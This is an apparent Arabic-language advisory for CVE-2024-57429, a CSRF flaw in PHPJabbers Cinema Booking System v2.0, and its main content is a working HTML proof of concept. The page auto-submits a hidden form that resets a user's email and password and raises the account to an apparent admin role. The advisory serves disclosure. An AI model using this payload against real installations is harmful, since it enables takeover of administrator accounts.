
CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 معرضة لهجوم CSRF، مما يسمح للمهاجمين بتصعيد الصلاحيات عن طريق تزوير الطلبات نيابة عن المسؤول.
ثغرة أمنية من نوع تزوير الطلب عبر المواقع (CSRF) في دالة pjActionUpdate ضمن نظام حجز السينما PHPJabbers v2.0 تسمح للمهاجمين عن بُعد بتصعيد الصلاحيات عن طريق خداع مدير موثوق لإرسال طلب غير مصرح به.
استغلال هذه الثغرة CSRF يمكن أن يؤدي إلى إجراءات غير مصرح بها، مثل:
<html>
<!-- CSRF PoC - Update Admin User -->
<body>
<form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
<input type="hidden" name="user_update" value="1" />
<input type="hidden" name="id" value="3" />
<input type="hidden" name="role_id" value="1" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password" value="newpassword123" />
<input type="hidden" name="name" value="Attacker" />
<input type="hidden" name="phone" value="1234567890" />
<input type="hidden" name="status" value="T" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>